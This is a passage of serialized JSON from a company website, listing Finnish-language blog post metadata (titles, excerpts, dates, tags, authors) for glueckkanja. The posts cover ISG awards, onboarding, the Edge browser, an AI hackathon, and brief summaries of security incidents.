Trust","NIS2",{"id":1478,"title":1479,"author":1480,"cta":494,"description":1481,"hideInRecent":484,"layout":1039,"meta":1482,"moment":1483,"path":1488,"stem":1489,"tags":1490,"webcast":484},"content_fi/posts/2026-08-08-isg-germany-2026.md","Neljä kertaa Leader. glueckkanja ISG-tutkimuksessa Saksa 2026",[1279],"ISG nimesi tutkimuksensa tänä vuonna uudelleen. Microsoft Cloud Ecosystemistä tuli Microsoft AI and Cloud Ecosystem, ja nimen mukana mittapuu on siirtynyt: arvioitavana ei ole enää se, kuka ottaa Microsoft-alustat käyttöön, vaan se, kuka ylläpitää Copilotia, agentteja ja tekoälyworkloadeja hallittavasti. Asemaamme uusi mittapuu ei muuttanut. ISG Provider Lens® -tutkimus Saksa 2026 asemoi meidät Leaderiksi neljässä kvadrantissa: Microsoft Productivity and Business Process Services ja Azure Managed Services, kummassakin Large Market ja Mid Market. Vuosien 2021, 2023, 2024 ja 2025 jälkeen tämä on viides Leader-luokitus Saksassa, Sveitsissä hyppy Leader-kvadranttiin tapahtui kaksi viikkoa aiemmin.",{"lang":1041,"date":1483,"categories":1484,"blogtitlepic":1486,"customExcerpt":1487},"2026-08-08",[1485],"Corporate","head-isg-de-2026.png","ISG Provider Lens® -tutkimus 2026 asemoi glueckkanjan Saksassa Leaderiksi neljässä kvadrantissa: Microsoft Productivity and Business Process Services ja Azure Managed Services, kummassakin Large ja Mid Market. Tutkimuksen nimi on nyt Microsoft AI and Cloud Ecosystem, ja mittapuu on siirtynyt: arvioidaan, kuka ylläpitää tekoäly- ja agenttiworkloadeja hallittavasti.","/posts/2026-08-08-isg-germany-2026","posts/2026-08-08-isg-germany-2026",[1491,1492],"Award","ISG",{"id":1494,"title":1495,"author":1496,"cta":494,"description":1497,"hideInRecent":484,"layout":1039,"meta":1498,"moment":1499,"path":1503,"stem":1504,"tags":1505,"webcast":484},"content_fi/posts/2026-07-31-isg-switzerland-2026.md","Rising Starista Leaderiksi. glueckkanja ISG-tutkimuksessa Sveitsi 2026",[1279],"Vuonna 2024 perustimme glueckkanja Switzerland AG:n ja otimme käyttöön toimiston zentroomissa osoitteessa Bahnhofplatz 10b Bernissä. Vuonna 2025 ISG luokitteli meidät Sveitsin markkinassa Rising Stariksi, toimittajaksi, jonka analyytikot uskovat hyppäävän Leader-kvadranttiin. Nyt hyppy on dokumentoitu: ISG Provider Lens® -tutkimus 2026 asemoi meidät Sveitsissä Leaderiksi kvadrantissa Microsoft AI and Cloud Ecosystem, alueilla Azure Managed Services ja Microsoft Productivity and Business Process Services.",{"lang":1041,"date":1499,"categories":1500,"blogtitlepic":1501,"customExcerpt":1502},"2026-07-31",[1485],"head-isg-ch-2026.png","ISG Provider Lens® -tutkimus 2026 asemoi glueckkanjan Sveitsissä Leaderiksi kvadrantissa Microsoft AI and Cloud Ecosystem, alueilla Azure Managed Services ja Microsoft Productivity and Business Process Services. Kaksi vuotta Bernin markkinoilletulon jälkeen, vuosi Rising Star -tunnustuksen jälkeen.","/posts/2026-07-31-isg-switzerland-2026","posts/2026-07-31-isg-switzerland-2026",[1491,1492],{"id":1507,"title":1508,"author":1509,"cta":494,"description":577,"hideInRecent":484,"layout":1039,"meta":1510,"moment":1511,"path":1515,"stem":1516,"tags":1517,"webcast":484},"content_fi/posts/2026-07-24-outbreak-openai-hugging-face.md","Outbreak. Mitä OpenAI/Hugging-Face-tapaus paljastaa ja mitä ei",[1252],{"lang":1041,"date":1511,"categories":1512,"blogtitlepic":1513,"customExcerpt":1514},"2026-07-24",[1046],"head-outbreak.jpg","AI-agentti murtautuu ulos testiympäristöstään, löytää nollapäivähaavoittuvuuden ja hakkeroi toisen yrityksen. Kuulostaa käsikirjoitukselta, mutta tapahtui todella heinäkuussa 2026. Aika asettaa asia raittiiseen kehykseen: hieman psykologiaa, kaksi tietoturvaveteraania ja kysymys siitä, mitä tämä merkitsee teidän puolustuksellenne.","/posts/2026-07-24-outbreak-openai-hugging-face","posts/2026-07-24-outbreak-openai-hugging-face",[1518,1084,1475],"AI",{"id":1520,"title":1521,"author":1522,"cta":494,"description":1523,"hideInRecent":484,"layout":1039,"meta":1524,"moment":1525,"path":1529,"stem":1530,"tags":1531,"webcast":484},"content_fi/posts/2026-07-22-isg-cybersecurity-2026.md","Leader ja Rising Star. glueckkanja ISG:n Cybersecurity-tutkimuksessa 2026",[1279],"Uutena kvadrantissa ja heti Leader: ISG Provider Lens® -tutkimus \"Cybersecurity – Services and Solutions 2026\" asemoi glueckkanjan Leaderiksi Next-Gen SOC/MDR Services -alueella Saksan keskisuurten yritysten markkinassa. Next-Gen SOC/MDR Services -kokonaismarkkinassa ISG palkitsee meidät Rising Starina, eli toimittajana, jonka analyytikot uskovat hyppäävän Leader-kvadranttiin seuraavien 12–24 kuukauden aikana.",{"lang":1041,"date":1525,"categories":1526,"blogtitlepic":1527,"customExcerpt":1528},"2026-07-22",[1485],"head-isg-cybersecurity-2026.png","ISG Provider Lens® -tutkimus Cybersecurity 2026 palkitsee glueckkanjan Leaderina kvadrantissa Next-Gen SOC/MDR Services (Midmarket). Next-Gen SOC/MDR Services -kokonaismarkkinassa olemme Rising Star. ISG toteaa meille keskimääräistä paremman kasvun, syvän Microsoft-tietoturvaosaamisen ja 24/7-SOC:n Saksasta.","/posts/2026-07-22-isg-cybersecurity-2026","posts/2026-07-22-isg-cybersecurity-2026",[1491,1492,1046],{"id":1533,"title":1534,"author":1535,"cta":494,"description":1536,"hideInRecent":484,"layout":1039,"meta":1537,"moment":1538,"path":1541,"stem":1542,"tags":1543,"webcast":484},"content_fi/posts/2026-07-06-the-holy-trinity.md","The Holy Trinity: mitä tekoäly todella tarvitsee tehdäkseen työtä",[1279],"Valmistava yritys haluaa tietää, mitkä sen 14 000 SKU:sta ovat todella kannattavia. Vastaus on kolmessa järjestelmässä, jotka eivät ole koskaan vaihtaneet keskenään yhtäkään datapistettä. Vielä vähän aikaa sitten sen selvittäminen vaati kolme osastoa, kaksi viikkoa ja aimo annoksen hyvää tahtoa. Vuoden 2026 alusta tekoäly pystyy vastaamaan tähän kysymykseen minuuteissa: käymään datan läpi, luomaan yhteyksiä, tuottamaan suosituksen. Edellyttäen, että sillä on pääsy.",{"lang":1041,"date":1538,"categories":1539,"blogtitlepic":1540},"2026-07-06",[131],"head-the-holy-trinity","/posts/2026-07-06-the-holy-trinity","posts/2026-07-06-the-holy-trinity",[1518,131],{"id":1545,"title":1546,"author":1547,"cta":494,"description":1548,"hideInRecent":484,"layout":1039,"meta":1549,"moment":1550,"path":1554,"stem":1555,"tags":1556,"webcast":484},"content_fi/posts/2026-07-01-onboarding-process.md","Sopimus allekirjoitettu: näin perehdytyksesi meillä etenee",[1370],"Miten teidän perehdytyksenne oikeastaan etenee? Kysymys, joka tulee vastaan yhä uudelleen keskusteluissa hakijoiden kanssa, sillä moni on jo kerran kokenut takkuisen perehdytyksen. Sitäkin tärkeämpää meille on antaa sinulle hyvä tunne alusta alkaen.",{"lang":1041,"date":1550,"categories":1551,"blogtitlepic":1552,"customExcerpt":1553},"2026-07-01",[1485],"Onboarding_Blogheader","Sopimus on allekirjoitettu, ensimmäinen suuri askel on otettu. Mutta miten tästä eteenpäin? Otamme sinut mukaan kulissien taakse perehdytykseemme, PreBoardingista ensimmäiseen viikkoon tiimissä.","/posts/2026-07-01-onboarding-process","posts/2026-07-01-onboarding-process",[1557,1558,1559],"Employer Branding","Onboarding","Unternehmenskultur",{"id":1561,"title":1562,"author":1563,"cta":494,"description":1564,"hideInRecent":484,"layout":1039,"meta":1565,"moment":1566,"path":1570,"stem":1571,"tags":1572,"webcast":484},"content_fi/posts/2026-06-26-frontier-partner.md","Microsoft Frontier Partner: kuulumme joukkoon",[1279],"Microsoftin kumppaniekosysteemissä on koko joukko tunnustuksia, ja silti Frontier Partner -merkki erottuu rakenteeltaan muista palkinnoista. Sitä ei voi hakea, vaan Microsoft myöntää sen omasta aloitteestaan pienelle joukolle kumppaneita, joiden on vakuutettava useammalla osa-alueella rinnakkain sen sijaan, että loistaisivat vain yhdellä. Microsoft arvioi tässä osoitettua osaamista Cloud & AI Platforms-, AI Business Solutions- ja Security-alueilla yhtä lailla ja puhuttelee näin yrityksiä, jotka eivät ymmärrä tekoälyä olemassa olevan IT:n päälle liimattuna lisänä vaan yhtenäisen arkkitehtuurin tuloksena, joka kantaa identiteetistä päätelaitteen kautta tuotannolliseen tekoälykäyttöön asti.",{"lang":1041,"date":1566,"categories":1567,"blogtitlepic":1568,"customExcerpt":1569},"2026-06-26",[1485],"head-frontier-partner-badge.jpg","Microsoft AI Cloud Partner Program -ohjelmaan on hiljattain tullut uusi huipputunnustus, Frontier Partner -merkki. Microsoft myöntää sen ainoastaan pienelle joukolle kumppaneita maailmanlaajuisesti, jotka toimittavat tekoälyprojekteja kestävästi koko Microsoft-stackin läpi, työpaikasta pilvialustaan ja tietoturvaan sekä itse tekoälysovellukseen asti, ja jotka ovat osoittaneet tämän käytännössä. DACH-alueella tähän joukkoon kuuluu vain kourallinen yrityksiä, ja me olemme yksi niistä.","/posts/2026-06-26-frontier-partner","posts/2026-06-26-frontier-partner",[1491,1573,1518],"Microsoft Partner",{"id":1575,"title":1576,"author":1577,"cta":494,"description":1578,"hideInRecent":484,"layout":1039,"meta":1579,"moment":1580,"path":1584,"stem":1585,"tags":1586,"webcast":484},"content_fi/posts/2026-06-09-vair-run.md","160 kilometriä hyvän asian puolesta",[1377],"Sunnuntaiaamu, klo 8:30, Holbeinsteg Main-joen varrella. Yksitoista kollegaa yhtenäisissä NinjaCat-paidoissa, valmiina Frankfurter Runden -tapahtumaan. Sateen, salamoiden ja ukkosen kera. Hyvän asian puolesta juokseminen oli riittävä motivaatio nyöritä juoksukengät huonosta säästä huolimatta.",{"lang":1041,"date":1580,"categories":1581,"blogtitlepic":1582,"customExcerpt":1583},"2026-06-08",[1485],"frankfurter-runden.png","Yksitoista kollegaa, 16 kierrosta, 160 kilometriä, ukkosmyrsky ja palkintopallisija: glueckkanja osallistui Frankfurter Runden 2026 -tapahtumaan ja lahjoitti jokaisesta juostusta kierroksesta VAIR e.V.:lle, joka rakentaa Offenbachiin inklusiivista liikunta- ja kulttuuripuistoa.","/posts/2026-06-09-vair-run","posts/2026-06-09-vair-run",[1587,1557,1588],"Top Arbeitgeber","Soziales Engagement",{"id":1590,"title":1591,"author":1592,"cta":494,"description":1593,"hideInRecent":484,"layout":1039,"meta":1594,"moment":1595,"path":1599,"stem":1600,"tags":1601,"webcast":484},"content_fi/posts/2026-04-10-incident-to-intelligence.md","Tuntemattoman AMOS Stealerin anatomia: alertista immuniteettiin tunneissa",[1358],"Kun SOC:ssamme laukeaa alert, kello alkaa käydä: ei vain kyseiselle asiakkaalle vaan kaikille organisaatioille suojamme alla. Vaarallisin hetki nykyaikaisessa uhkaympäristössä on Intelligence Gap, se aikaikkuna uuden haittaohjelmavariantin ensimmäisen käytön ja sen päivän välillä, jona ala saa siitä tiedon.",{"lang":1041,"date":1595,"categories":1596,"blogtitlepic":1597,"customExcerpt":1598},"2026-04-10",[1046],"head-amos-stealer.png","Tähän asti dokumentoimaton AMOS-stealerin variantti kompromentoi macOS-endpointin. Ei tunnettuja hasheja, ei C2-tietoja julkisissa tietokannoissa. SOC:mme purki kuusi obfuskointikerrosta, poimi kaikki indikaattorit ja jakoi suojauksen kaikille SOC-asiakkaille tunneissa, jo ennen kuin ala oli edes nähnyt samplea.","/posts/2026-04-10-incident-to-intelligence","posts/2026-04-10-incident-to-intelligence",[1602,1603,1604,1605,1606],"Threat Intelligence","Incident Response","macOS Security","Malware Analysis","Cyber Security Operations Center",{"id":1608,"title":1609,"author":1610,"cta":494,"description":1611,"hideInRecent":484,"layout":1039,"meta":1612,"moment":1613,"path":1616,"stem":1617,"tags":494,"webcast":484},"content_fi/posts/2026-03-21-microsoft-edge-corporate-browser.md","Miksi Edgen pitäisi olla ainoa Corporate Browserinne",[1148],"Selaimen valinta on yritysympäristöissä strateginen päätös: se vaikuttaa suoraan siihen, kuinka paljon turvallisuutta ja hallintatyötä teillä todellisuudessa on. Google Chrome oli pitkään ilmeinen valinta, mutta Microsoft Edge on kehittynyt selaimeksi, joka kytkeytyy suoraan olemassa olevaan stackiin, etenkin kun Microsoft 365 on käytössä ja hallinta hoidetaan Intunen kautta.",{"lang":1041,"date":1613,"blogtitlepic":1614,"customExcerpt":1615},"2026-03-21","head-microsoft-edge-default-browser.jpg","Mikään yritys ei ole oikeasti valinnut Chromea; se oli vain siellä, omalla synkronointilogiikallaan, omalla tilinhallinnallaan, omalla käytäntöjen käyttöliittymällään. Microsoft Edge sen sijaan kytkeytyy suoraan infrastruktuuriin, joka on jo muutenkin käytössä: Entra ID, Intune, Defender. Tämä artikkeli näyttää, miltä vaihto näyttää, miten Chrome uudelleenohjataan Intune-käytännöllä laskeutumissivulle ja mikä jää pois, kun lakkaa käyttämästä kahta selainta rinnakkain.","/posts/2026-03-21-microsoft-edge-corporate-browser","posts/2026-03-21-microsoft-edge-corporate-browser",{"id":1619,"title":1620,"author":1621,"cta":494,"description":1622,"hideInRecent":484,"layout":1039,"meta":1623,"moment":1624,"path":1628,"stem":1629,"tags":1630,"webcast":484},"content_fi/posts/2026-03-20-stryker-attack-intune-privilege.md","Yksi admin-tili oli kaikki, mitä siihen tarvittiin.",[1252],"Keskiviikko 11. maaliskuuta 2026. Stryker-toimistojen työntekijät 79 maassa käynnistivät tietokoneensa ja löysivät ne tyhjinä. Kirjautumisnäytöt korvattuina logolla. Yrityksen kannettavat, työpuhelimet, yksityiset laitteet, jotka oli rekisteröity yrityksen BYOD-ohjelmaan – kaikki pyyhitty yhtä aikaa, yhden yön aikana. Ei kiristysohjelmaa, ei haittaohjelmasignatuureja, ei mitään, minkä päätelaitteiden suojaustyökalu olisi voinut havaita.",{"lang":1041,"date":1624,"categories":1625,"blogtitlepic":1626,"customExcerpt":1627},"2026-03-20",[1046],"head-stryker.jpg","11. maaliskuuta 2026 Handala pyyhki laitteita 79 maassa, ja siihen tarvittiin vain yksi kaapattu Intunen admin-tili. Ei haittaohjelmia, ei exploittia, pelkkiä laillisia hallintatyökaluja käännettynä niiden omistajia vastaan. Mitä tapahtui, miksi se toimi ja mitkä kaksi arkkitehtuurin aukkoa on suljettava.","/posts/2026-03-20-stryker-attack-intune-privilege","posts/2026-03-20-stryker-attack-intune-privilege",[71,1474,1475],{"id":1632,"title":1633,"author":1634,"cta":494,"description":1635,"hideInRecent":484,"layout":1039,"meta":1636,"moment":1637,"path":1641,"stem":1642,"tags":1643,"webcast":484},"content_fi/posts/2026-03-16-ai-agent-hackathon.md","Kuusi agenttia. Neljä viikkoa. Aitoa tuotantokäyttöä.",[1279],"Kuinka monta tuntia viikossa IT-osastonne käyttää tehtäviin, jotka agentti hoitaisi minuuteissa?",{"lang":1041,"date":1637,"categories":1638,"blogtitlepic":1639,"customExcerpt":1640},"2026-03-16",[1485],"head-ai-agent-hackathon.jpg","Kuusi yritystä, neljän viikon rakennusvaihe, kuusi toimivaa AI-agenttia – siitä oli kyse ensimmäisessä glueckkanja AI Agent Hackathonissa. Kiekert, Dr. Oetker, Eckes-Granini, igefa ja lila logistik rakensivat Copilot Studiossa agentteja, jotka ovat tänään tuotannossa. Mitä siinä syntyi ja miten formaatti toimii.","/posts/2026-03-16-ai-agent-hackathon","posts/2026-03-16-ai-agent-hackathon",[1518,1644,1645,1646],"Copilot Studio","Hackathon","AI Agents",{"Karsten Kleinschmidt":1648,"Fritz Zurhorst":1649,"Nadine Klein":1650,"Jan Geisbauer":1651,"Carolin Kanja":1655,"Anna Ulbricht":1656,"Annette Brauns":1657,"Pascal Asch":1658,"Steffen Schwerdtfeger":1659},{"display_name":1117,"avatar":1118,"permalink":1119,"twitter":1120,"linkedin":1121,"imageOffsetTop":1122,"imageOffsetLeft":1123},{"display_name":523,"avatar":1093,"permalink":1094,"linkedin":1095,"imageOffsetTop":1096},{"display_name":524,"avatar":1112,"permalink":1113,"twitter":1114,"linkedin":1115,"imageOffsetTop":1096},{"display_name":1252,"avatar":1253,"permalink":1254,"twitter":1255,"linkedin":1255,"imageOffsetTop":1096,"socials":1652},[1653,1654],{"text":1258,"href":1259},{"text":1261,"href":1262},{"display_name":1279,"avatar":1280,"permalink":1281,"twitter":1282,"linkedin":1283},{"display_name":1370,"avatar":1371,"permalink":1372,"linkedin":1373,"imageOffsetTop":1374,"imageOffsetLeft":1375},{"display_name":1377,"avatar":1378,"permalink":1379,"linkedin":1380,"imageOffsetTop":1381,"imageOffsetLeft":1122},{"display_name":1358,"avatar":1359,"permalink":1360,"linkedin":1361,"imageOffsetTop":1195},{"display_name":1148,"avatar":1149,"permalink":1150,"linkedin":1151,"twitter":1152,"imageOffsetTop":1153,"imageOffsetLeft":1154},{"id":1088,"extension":1089,"meta":1661,"stem":8,"__hash__":1439},{"Fritz Zurhorst":1662,"Nadine Klein":1663},{"display_name":523,"avatar":1093,"permalink":1094,"linkedin":1095,"imageOffsetTop":1096},{"display_name":524,"avatar":1112,"permalink":1113,"twitter":1114,"linkedin":1115,"imageOffsetTop":1096},1791383929067]